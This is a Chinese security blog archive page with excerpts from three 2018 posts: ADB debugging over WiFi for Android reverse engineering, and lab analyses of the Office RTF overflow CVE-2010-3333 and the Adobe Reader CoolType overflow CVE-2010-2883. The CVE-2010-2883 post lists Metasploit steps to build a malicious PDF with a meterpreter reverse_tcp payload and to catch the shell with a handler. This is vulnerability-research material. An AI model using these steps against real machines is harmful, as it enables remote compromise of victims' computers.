跳至主要内容

博文

目前显示的是 九月, 2018的博文

使用WIFI进行ADB调试

https://ift.tt/2zqlZcx 需求 步骤 Android Studio 安装插件 手机安装apk 建立设备与 Android Studio 之间的连接 需求 有的时候逆向的时候老是需要插入usb线,有点烦。 有的时候需要给电视盒子装一些应用,老是插usb也很麻烦。 步骤 Android Studio 安装插件 Android Studio 安装WIFI ADB 插件 首先打开 Android Studio 的首选项,找到插件选项,输入ADB WIFI。 发现下方没有东西,点一下 Search in repositories 。 点击安装,装好了之后,也显示要重启Android stuido ,那么就重启一下吧。 手机安装apk 我在网上比较了几个ADB WIFI apk软件,发现还是酷安上的apk比较新, ADB WIFI 下载并在手机上安装。 建立设备与 Android Studio 之间的连接 安卓打开app 打开 Android Studio ---> Tools --> Android --> ADB WIFI --> ADB Use to WIFI 这样就可以开发了 如果不是开发呢?像我主要是逆向 那也很简单 adb connect ip:port The post 使用WIFI进行ADB调试 appeared first on cole . https://ift.tt/2OLIyh0 Android Reverse Engineering, reverse engineering, adb, android, android reverse, jeb September 24, 2018 at 10:51AM

CVE-2010-3333 Microsoft RTF栈溢出漏洞

https://ift.tt/2QHInV6 分析环境 MSF生成样本 分析样本 分析环境 测试系统 windows xp 2003 动态调试器 windbg 6.1 测试用例生成主机 kali 2018.1 分析软件 office 2003 sp3 MSF生成样本 查找漏洞利用程序 选择 目标机器和生成的rtf文件的名称 生成 分析样本 打开word,windbg附加到word上,然后通过word打开rtf文件 报错信息如上,在进行movs指令的时候发生了崩溃,并且崩溃单在mso.dll中 查看一下edi 的状态 发现edi是一个只读的内存区域 去看了以下汇编代码发现,rep movs就相当于memcpy,而memcpy的次数是由ecx决定的,之类没有控制ecx的大小,因此复制过多,到了0x130000这个只读内存区域30ed442c。上面是猜测ecx的来源,还不能确定,现在要去找调用函数。 通过kb命令查看,发现此时栈用已经变得乱套了,记住这个地址,我们重新打开word,下断点,然后查看栈中的调用情况,回溯调用的函数。 通过windbg的call stacks,发现调用函数是0x30f0b5c2. 也可以使用ub 命令来查看调用关系,+0x16b0是出现问题的函数,+0x2581是调用者堆栈的返回地址,可以网上回溯. 找到调用函数之后,重启windbg,在这个调用函数下断点. 单步按p或者f10跟踪,发现在0x30f0b5f8发生了崩溃. 可以发现,这里调用的是[eax+1ch],是函数0x30ed4406,按t或者f8跟进. 通过返汇编窗口就发现了造成崩溃的点. 通过跟踪分析发现ecx的复制. 这个漏洞是office在Open Xml文件格式转换器在处理RTF中的'pFragments'属性的时候发生了异常,存在栈溢出。 通过分析下图: 可以得知add ecx,0xffff其实就是清理前4位保留后四位,那么原本的ecx=0004c8ac中,有用的值也就是c8ac,转成正常序就是acc8 ,使用010editor 打开被问题文档 发现异常数据有两处,这里我们也不知道到底是哪了,而且都是pFrqments的段,这里重新改一...

CVE-2010-2883 漏洞分析

https://ift.tt/2NPO3ho 分析环境 环境搭建注意事项 静态分析漏洞成因 攻击样本生成 使用msf生成攻击样本 使用MSF监听肉鸡 目标靶机运行样本 样本exploit 提取 动态调试 shellcode 分析环境 漏洞软件 adobe reader 9.3.4 运行环境 windows xp sp3 静态分析工具 IDA 7.0 MacVersion 动态调试器 OD1.1 模拟攻击主机 kali 2018.1 pdf object提取器 PDF Stream Dumpe 环境搭建注意事项 adobe reader 下载地址 adobe reader 9.x adober reader 在虚拟机下的安装 因为虚拟机通常都是一个盘,这个默认安装需要有一个d盘(问题跟本用不着D盘),因此以一直报错 在终端输入 subst D: %temp% 临时创建一个d盘 静态分析漏洞成因 在CoolTy.dll 中,发现解析SING表的时候,没有验证uniqueName的长度,使用strcat进行拼接字符串的时候,没有对长度进行验证,导致栈溢出。 具体原因见下图: 攻击样本生成 使用msf生成攻击样本 search adobe_cooltype_sing 通过这个图可以看到,第一个是browser的,第二个是文件格式的,肯定选第二个 use exploit/windows/fileformat/adobe_cooltype_sing 使用 info 查看exploit信息 调用meterpreter载荷,反向连接到靶机机 set payload windows/meterpreter/reverse_tcp  使用 show options 显示需要设置的选项 对参数进行设置,并输入 exploit 命令生成样本 使用MSF监听肉鸡 使用handler监听模块  use exploit/multi/handle 回弹一个tcp连接 设置基本信息后,使用 exploit 开启监听 目标靶机运行样本 adobe reader 打开pdf文件 已经连接到kali,并获得权限 样本expl...